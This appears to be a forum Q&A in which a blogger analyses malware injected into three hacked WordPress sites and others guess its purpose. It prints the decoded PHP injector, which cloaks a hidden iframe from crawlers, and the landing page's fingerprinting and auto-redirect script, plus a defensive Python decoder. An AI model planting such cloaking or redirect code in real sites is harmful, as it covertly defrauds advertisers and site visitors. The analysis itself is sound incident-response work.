2011-06-12 21 views
10

WordPress hacked: what does this script really do?

I maintain three WordPress blogs, and yesterday morning all of them were hacked. In every one of my index.php files, the first line looked like this:

<?php eval(base64_decode('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')) 

Apart from fixing it (which seems to have worked), I wonder what it does, and for what purpose.

So I decoded the injected code:

error_reporting(0); 
$bot = FALSE ; 
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api'); 
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"), 
    array("64.68.80.0" ,"64.68.87.255" ), 
    array("66.102.0.0", "66.102.15.255"), 
    array("64.233.160.0","64.233.191.255"), 
    array("66.249.64.0", "66.249.95.255"), 
    array("72.14.192.0", "72.14.255.255"), 
    array("209.85.128.0","209.85.255.255"), 
    array("198.108.100.192","198.108.100.207"), 
    array("173.194.0.0","173.194.255.255"), 
    array("216.33.229.144","216.33.229.151"), 
    array("216.33.229.160","216.33.229.167"), 
    array("209.185.108.128","209.185.108.255"), 
    array("216.109.75.80","216.109.75.95"), 
    array("64.68.88.0","64.68.95.255"), 
    array("64.68.64.64","64.68.64.127"), 
    array("64.41.221.192","64.41.221.207"), 
    array("74.125.0.0","74.125.255.255"), 
    array("65.52.0.0","65.55.255.255"), 
    array("74.6.0.0","74.6.255.255"), 
    array("67.195.0.0","67.195.255.255"), 
    array("72.30.0.0","72.30.255.255"), 
    array("38.0.0.0","38.255.255.255") 
    ); 
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR'])); 
foreach ($stop_ips_masks as $IPs) { 
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1])); 
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;} 
} 
foreach ($user_agent_to_filter as $bot_sign){ 
    if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;} 
} 
if (!$bot) { 
echo '<iframe src="http://wumpearpmy.cz.cc/go/1" width="1" height="1"></iframe>'; 
} 

Roughly, if I understood correctly, it will show an extra iframe with some source that it will have to load, but only if the user agent and IP are not in the list of blocked IPs or blocked bots. My guess: to make sure my site doesn't get blacklisted, while any visitor gets spammed.

But I was still curious: what does it really do?

So I followed the link to http://wumpearpmy.cz.cc/go/1 using RESTClient and got the following HTML back:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 
<html> 
<title>http://groupon.be</title> 
<head> 
    <STYLE> 
     BODY { 
       BACKGROUND: #666; FONT: 100% Georgia, "Times New Roman", Times, serif; COLOR: #666 
     } 
     A { 
      COLOR: #fe701a 
     } 
     A:hover { 
      COLOR: #fdc336 
     }  
     P { 
      FONT: 105% century 
     }  
     .main_wrapper{ 
      width:90%; margin:auto; border:10px solid #888888; background-color:#FFFFFF; margin-top:25px; height:450px; 
     } 
     .skipimage{margin:auto; text-align:center; height:30%}  
     .img_wrapper{background-image:url(continue.gif); background-position:top; background-repeat:no-repeat; width:435px; height:215px} 
    </style> 



     <script type="text/javascript"> 
       function getCookie(name){var start=document.cookie.indexOf(name+"=");var len=start+name.length+1;if((!start)&&(name!=document.cookie.substring(0,name.length))){return null;} 
       if(start==-1)return null;var end=document.cookie.indexOf(';',len);if(end==-1)end=document.cookie.length;return unescape(document.cookie.substring(len,end));}function setCookie(name,value,expires,path,domain,secure){var today=new Date();today.setTime(today.getTime()); 
       var expires_date=new Date(today.getTime()+(expires));document.cookie=name+'='+escape(value)+ 
       ((expires)?';expires='+expires_date.toGMTString():'')+ 
       ((path)?';path='+path:'')+ 
       ((domain)?';domain='+domain:'')+ 
       ((secure)?';secure':'');} 
     </script> 
    </head> 
<body> 

    <form method="get" action="http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names" name="rr"> 
     <input type="hidden" name="sid" value="294787600" /> 
     <input type="hidden" name="sa" value="13" /> 
     <input type="hidden" name="p" value="1" /> 
     <input type="hidden" name="s" value="98795" /> 
     <input type="hidden" name="qt" value="1307865129" /> 
     <input type="hidden" name="q" value="domain names" /> 
     <input type="hidden" name="rf" value="" /> 
     <input type="hidden" name="enc" value="" /> 
     <input type="hidden" name="enk" value="RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm" /> 
     <input type="hidden" name="xsc" value="" /> 
     <input type="hidden" name="xsp" value="" /> 
     <input type="hidden" name="xsm" value="" /> 
     <input type="hidden" name="xuc" value=""/> 
     <input type="hidden" name="xcf" value=""/> 
     <input type="hidden" name="xai" value=""/> 
       <input type="hidden" name="qxcli" value="8904e76aaa70acee" /> 
       <input type="hidden" name="qxsi" value="e0f63d5350e1c1d9" /> 
       <input type="hidden" name="mk" value="1" /> 
       <input type="hidden" name="ScreenX" value="0" /> 
     <input type="hidden" name="ScreenY" value="0" /> 
     <input type="hidden" name="BrowserX" value="0" /> 
     <input type="hidden" name="BrowserY" value="0"/> 
     <input type="hidden" name="MouseX" value="0"/> 
     <input type="hidden" name="MouseY" value="0"/>  
     <input type="hidden" name="is_iframe" value="0"/> 
    </form> 

    <div class="main_wrapper"> 
    <table width="60%" border="0" align="center" cellpadding="0" cellspacing="0" height="100%"> 
    <tr> 
     <td align="center" valign="middle"> 
     <table width="435" border="0" cellspacing="0" cellpadding="0"> 
      <tr> 
      <td class="img_wrapper" > 
      <div style="width:60%; margin:auto;height:215px;"> 
       <div class="skipimage" style="padding-top:40px;"> 
        <!-- a href="javascript:void(0)" onclick="press();"><img src="skip.gif"/border="0"></a --> 
        <a href="http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9"><img src="skip.gif"/border="0"></a> 
       </div> 
       <div class="skipimage"> 
        <img src="ajax-loader.gif"/border="0"> 
        <P><SPAN>Your request is loading...</SPAN></P> 
       </div> 
      </div> 
      </td> 
     </tr> 
     </table> 
     <br /> 
     <p>If you are not redirected within 2 seconds <a href="http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9">click here</a> to continue</p> 
     </td> 
    </tr> 
    </table> 
    </div> 
    <script type="text/javascript"> 

         var hexcase=0;var b64pad="";var chrsz=8;function hex_md5(s){return binl2hex(core_md5(str2binl(s),s.length*chrsz));} 
         function core_md5(x,len){x[len>>5]|=0x80<<((len)%32);x[(((len+64)>>>9)<<4)+14]=len;var a=1732584193;var b=-271733879;var c=-1732584194;var d=271733878;for(var i=0;i<x.length;i+=16){var olda=a;var oldb=b;var oldc=c;var oldd=d;a=md5_ff(a,b,c,d,x[i+0],7,-680876936);d=md5_ff(d,a,b,c,x[i+1],12,-389564586);c=md5_ff(c,d,a,b,x[i+2],17,606105819);b=md5_ff(b,c,d,a,x[i+3],22,-1044525330);a=md5_ff(a,b,c,d,x[i+4],7,-176418897);d=md5_ff(d,a,b,c,x[i+5],12,1200080426);c=md5_ff(c,d,a,b,x[i+6],17,-1473231341);b=md5_ff(b,c,d,a,x[i+7],22,-45705983);a=md5_ff(a,b,c,d,x[i+8],7,1770035416);d=md5_ff(d,a,b,c,x[i+9],12,-1958414417);c=md5_ff(c,d,a,b,x[i+10],17,-42063);b=md5_ff(b,c,d,a,x[i+11],22,-1990404162);a=md5_ff(a,b,c,d,x[i+12],7,1804603682);d=md5_ff(d,a,b,c,x[i+13],12,-40341101);c=md5_ff(c,d,a,b,x[i+14],17,-1502002290);b=md5_ff(b,c,d,a,x[i+15],22,1236535329);a=md5_gg(a,b,c,d,x[i+1],5,-165796510);d=md5_gg(d,a,b,c,x[i+6],9,-1069501632);c=md5_gg(c,d,a,b,x[i+11],14,643717713);b=md5_gg(b,c,d,a,x[i+0],20,-373897302);a=md5_gg(a,b,c,d,x[i+5],5,-701558691);d=md5_gg(d,a,b,c,x[i+10],9,38016083);c=md5_gg(c,d,a,b,x[i+15],14,-660478335);b=md5_gg(b,c,d,a,x[i+4],20,-405537848);a=md5_gg(a,b,c,d,x[i+9],5,568446438);d=md5_gg(d,a,b,c,x[i+14],9,-1019803690);c=md5_gg(c,d,a,b,x[i+3],14,-187363961);b=md5_gg(b,c,d,a,x[i+8],20,1163531501);a=md5_gg(a,b,c,d,x[i+13],5,-1444681467);d=md5_gg(d,a,b,c,x[i+2],9,-51403784);c=md5_gg(c,d,a,b,x[i+7],14,1735328473);b=md5_gg(b,c,d,a,x[i+12],20,-1926607734);a=md5_hh(a,b,c,d,x[i+5],4,-378558);d=md5_hh(d,a,b,c,x[i+8],11,-2022574463);c=md5_hh(c,d,a,b,x[i+11],16,1839030562);b=md5_hh(b,c,d,a,x[i+14],23,-35309556);a=md5_hh(a,b,c,d,x[i+1],4,-1530992060);d=md5_hh(d,a,b,c,x[i+4],11,1272893353);c=md5_hh(c,d,a,b,x[i+7],16,-155497632);b=md5_hh(b,c,d,a,x[i+10],23,-1094730640);a=md5_hh(a,b,c,d,x[i+13],4,681279174);d=md5_hh(d,a,b,c,x[i+0],11,-358537222);c=md5_hh(c,d,a,b,x[i+3],16,-722521979);b=md5_hh(b,c,d,a,x[i+6],23,76029189);a=md5_hh(a,b,c,d,x[i+9],4,-640364487);d=md5_hh(d,a,b,c,x
[i+12],11,-421815835);c=md5_hh(c,d,a,b,x[i+15],16,530742520);b=md5_hh(b,c,d,a,x[i+2],23,-995338651);a=md5_ii(a,b,c,d,x[i+0],6,-198630844);d=md5_ii(d,a,b,c,x[i+7],10,1126891415);c=md5_ii(c,d,a,b,x[i+14],15,-1416354905);b=md5_ii(b,c,d,a,x[i+5],21,-57434055);a=md5_ii(a,b,c,d,x[i+12],6,1700485571);d=md5_ii(d,a,b,c,x[i+3],10,-1894986606);c=md5_ii(c,d,a,b,x[i+10],15,-1051523);b=md5_ii(b,c,d,a,x[i+1],21,-2054922799);a=md5_ii(a,b,c,d,x[i+8],6,1873313359);d=md5_ii(d,a,b,c,x[i+15],10,-30611744);c=md5_ii(c,d,a,b,x[i+6],15,-1560198380);b=md5_ii(b,c,d,a,x[i+13],21,1309151649);a=md5_ii(a,b,c,d,x[i+4],6,-145523070);d=md5_ii(d,a,b,c,x[i+11],10,-1120210379);c=md5_ii(c,d,a,b,x[i+2],15,718787259);b=md5_ii(b,c,d,a,x[i+9],21,-343485551);a=safe_add(a,olda);b=safe_add(b,oldb);c=safe_add(c,oldc);d=safe_add(d,oldd);} return Array(a,b,c,d);} 
         function md5_cmn(q,a,b,x,s,t){return safe_add(bit_rol(safe_add(safe_add(a,q),safe_add(x,t)),s),b);}function md5_ff(a,b,c,d,x,s,t){return md5_cmn((b&c)|((~b)&d),a,b,x,s,t);}function md5_gg(a,b,c,d,x,s,t){return md5_cmn((b&d)|(c&(~d)),a,b,x,s,t);}function md5_hh(a,b,c,d,x,s,t){return md5_cmn(b^c^d,a,b,x,s,t);}function md5_ii(a,b,c,d,x,s,t){return md5_cmn(c^(b|(~d)),a,b,x,s,t);}function safe_add(x,y){var lsw=(x&0xFFFF)+(y&0xFFFF);var msw=(x>>16)+(y>>16)+(lsw>>16);return(msw<<16)|(lsw&0xFFFF);}function bit_rol(num,cnt){return(num<<cnt)|(num>>>(32-cnt));}function str2binl(str){var bin=Array();var mask=(1<<chrsz)-1;for(var i=0;i<str.length*chrsz;i+=chrsz) bin[i>>5]|=(str.charCodeAt(i/chrsz)&mask)<<(i%32);return bin;}function binl2hex(binarray){var hex_tab=hexcase?"ABCDEF":"abcdef";var str="";for(var i=0;i<binarray.length*4;i++) {str+=hex_tab.charAt((binarray[i>>2]>>((i%4)*8+4))&0xF)+ hex_tab.charAt((binarray[i>>2]>>((i%4)*8))&0xF);} return str;} 
         /* function getCookie(cookiename){ var cookiestring=""+document.cookie; var index1=cookiestring.indexOf(cookiename); if(index1==-1 || cookiename=="") return ""; var index2=cookiestring.indexOf(';',index1); if (index2==-1) index2=cookiestring.length; return unescape(cookiestring.substring(index1+cookiename.length+1,index2));} */ 
         function add_ch(n,v){ if(v) { window.dch +="["+n+":"+enc_data(v)+"]";}}function enc_data(b){ if(typeof encodeURIComponent=="function") { return encodeURIComponent(b);} else {return escape(b);}}function G() {var dt = new Date(); if(!window.dch) { window.dch = "";} if(screen) { add_ch("h",screen.height); add_ch("w",screen.width); add_ch("cd",screen.colorDepth);} add_ch("tz", -dt.getTimezoneOffset()); add_ch("jv", navigator.javaEnabled()); if (navigator.plugins)  { add_ch("pg",navigator.plugins.length); } if (navigator.mimeTypes) { add_ch("mm",navigator.mimeTypes.length); } add_ch('ua', navigator.userAgent); add_ch('ts', Date.parse(dt)); tr = hex_md5(dch); setCookie('xch', tr, 63072000000, '/', '', '');}function gsc(){if(!getCookie("xch")){G();}} gsc(); 
       // global variable 
     var screenwidth; 
     var screenheight; 
     var viewportwidth; 
     var viewportheight; 
     var myMouseX, myMouseY; 
     var event_flag = false; 

       //window.onload = press; 
     function press(){ 

      var dim = screenDimension(); 
        document.forms['rr'].ScreenX.value = dim[0]; 
        document.forms['rr'].ScreenY.value = dim[1]; 

        // Browser X*Y 
        var dim_browser = browserDimension(); 
        document.forms['rr'].BrowserX.value = dim_browser[0]; 
        document.forms['rr'].BrowserY.value = dim_browser[1]; 

        if((window.top!=window.self)){ 

       document.forms['rr'].is_iframe.value = 1; 
      } 
        // document.onmousemove=getXYPosition; // start event listener 

         if (getCookie('mrc') != "groupon.be") { 
           setCookie('mrc', 'groupon.be', 180000, '/', '.maximumspeedfind.com', ''); 
           document.forms['rr'].submit(); 
         }else{ 
           document.forms['rr'].action = 'http://clicks.maximumspeedfind.com/xtr2_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9'; 
           document.forms['rr'].submit(); 
         } 
       } 
     /*   
       // mouse postion 
      function getXYPosition(e){ 

        if(!event_flag){ 

       // console.debug(e); 
       myMouseX = mouseXPos(e); 
       myMouseY = mouseYPos(e); 

         document.forms['rr'].MouseX.value = myMouseX; 
         document.forms['rr'].MouseY.value = myMouseY; 
         event_flag = true; 
        } 
      } 
      */ 
      // Screen 
      function screenDimension(){ 

      if (typeof screen.width != 'undefined' && typeof screen.height != 'undefined') 
       { 
         screenwidth = screen.width; 
         screenheight = screen.height; 
       } 
       return [screenwidth,screenheight]; 
      } 

     // Browser 
     function browserDimension(){ 

       // the more standards compliant browsers (mozilla/netscape/opera/IE7) use window.innerWidth and window.innerHeight 

      if (typeof window.innerWidth != 'undefined') 
      { 
         viewportwidth = window.innerWidth, 
         viewportheight = window.innerHeight 
      } 
      // IE6 in standards compliant mode (i.e. with a valid doctype as the first line in the document) 
     else if (typeof document.documentElement != 'undefined' && typeof document.documentElement.clientWidth != 'undefined' && document.documentElement.clientWidth != 0) 
       { 
           viewportwidth = document.documentElement.clientWidth, 
           viewportheight = document.documentElement.clientHeight 
       } 
       // older versions of IE 
       else 
       { 
         viewportwidth = document.getElementsByTagName('body')[0].clientWidth, 
         viewportheight = document.getElementsByTagName('body')[0].clientHeight 
       } 
       var my = [viewportwidth,viewportheight]; 
       return [viewportwidth,viewportheight]; 
       //document.write('<p>Your viewport width is '+viewportwidth+'x'+viewportheight+'</p>'); 
      }  
     /* 
      // Mouse postion 
      function mouseXPos(evt) { 
       if (evt.pageX) 
         return evt.pageX; 
        else if (evt.clientX) 
          return evt.clientX + (document.documentElement.scrollLeft ?document.documentElement.scrollLeft :document.body.scrollLeft); 
       else return null; 
      } 

      function mouseYPos(evt) { 
       if (evt.pageY) return evt.pageY; 
        else if (evt.clientY) 
          return evt.clientY + (document.documentElement.scrollTop ?document.documentElement.scrollTop :document.body.scrollTop); 
       else return null; 
      } 
    */ 
    press(); 
    </script> 
</body> 
</html> 

Ok. I can read groupon.com, but I suppose that is simply fake (too obvious?), and it will check for the existence of a cookie. Which cookie? I couldn't work that out immediately. And it will post within two seconds to clicks.maximumspeedfind.com. I didn't try doing that. There is a lot of code to make sure the window stays small, almost invisible. But there seems to be a lot of obfuscated code too.

Can anyone clarify for me what they are trying to do here? And how?

Is this someone trying to fake click-through rates? (Maybe naive.)

Answer
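The decoding step described in the question can be done statically, without ever running the injected PHP. The following is an added example, not part of the original post: `analyze_php`, the sample file and the `injected.example.invalid` domain are constructed for illustration. It unwraps `eval(base64_decode(...))` calls (including nested layers), then lists the iframe URLs and the request fields the payload uses to decide who sees them.

```python
import base64
import re

# Captures the base64 argument of eval(base64_decode('...')); the payload is decoded, never run.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""", re.I)
IFRAME_SRC = re.compile(r"""<iframe[^>]*?\bsrc\s*=\s*(['"])(.*?)\1""", re.I | re.S)
# Request fields the injected code on this page inspects before deciding to emit the iframe.
CLOAK_HINTS = ("HTTP_USER_AGENT", "REMOTE_ADDR", "ip2long")


def analyze_php(source, max_depth=5):
    """Statically unwrap each eval(base64_decode(...)) in `source` and list its indicators."""
    findings = []
    for m in EVAL_B64.finditer(source):
        layer, depth, decoded = m.group(2), 0, ""
        while layer is not None and depth < max_depth:
            try:
                decoded = base64.b64decode(layer).decode("utf-8", "replace")
            except ValueError:  # broken padding: keep the last good layer
                break
            depth += 1
            inner = EVAL_B64.search(decoded)  # obfuscated code may nest further layers
            layer = inner.group(2) if inner else None
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "layers": depth,
            "iframes": [url for _, url in IFRAME_SRC.findall(decoded)],
            "cloaking": [h for h in CLOAK_HINTS if h in decoded],
            "decoded": decoded,
        })
    return findings


# Constructed sample modelled on the index.php in the question; the domain is a placeholder.
_PAYLOAD = (
    "error_reporting(0); $bot = FALSE; "
    "if (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false) { $bot = true; } "
    "if (!$bot) { echo '<iframe src=\"http://injected.example.invalid/go/1\" "
    "width=\"1\" height=\"1\"></iframe>'; }"
)
SAMPLE_INDEX_PHP = (
    "<?php eval(base64_decode('%s')); ?>\n<?php\nrequire('./wp-blog-header.php');\n"
    % base64.b64encode(_PAYLOAD.encode()).decode()
)

if __name__ == "__main__":
    for f in analyze_php(SAMPLE_INDEX_PHP):
        print("line %(line)d, %(layers)d layer(s): iframes=%(iframes)s cloaking=%(cloaking)s" % f)
```

Running the function over every PHP file in the web root shows which files still carry the injected line after cleanup; a non-empty `cloaking` list explains why a crawler-style check of the site would not see the iframe.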

5

First of all, it hides itself from the crawlers that would detect it and alert the webmaster. Secondly, it appears to be a phishing attack. Well, not quite. I think someone was being paid for the number of impressions they received, and faked them using iframes.

The short version is: nothing healthy.

0

If I'm not mistaken, they are trying to post some data to a server. And they require a unique IP address for that, which they hope to get by redirecting your readers. It seems to search for domain names in something like a search engine. It may be that they are trying to earn revenue by redirecting people to that search page with a specific referrer.